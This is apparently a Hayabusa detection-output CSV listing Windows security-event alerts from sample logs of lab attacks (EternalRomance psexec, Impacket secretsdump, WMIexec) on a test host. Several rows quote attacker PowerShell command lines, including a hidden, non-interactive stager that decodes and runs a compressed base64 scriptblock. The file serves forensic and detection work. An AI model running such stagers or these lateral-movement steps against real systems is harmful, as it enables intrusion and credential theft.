ndow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7f0 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:05.633 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('<base64 payload omitted>'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:06.539 
+09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 
0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.042 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 
0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.226 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.258 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0xb32cb | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: 
\??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows 
| Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | 
LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 
4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 
0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
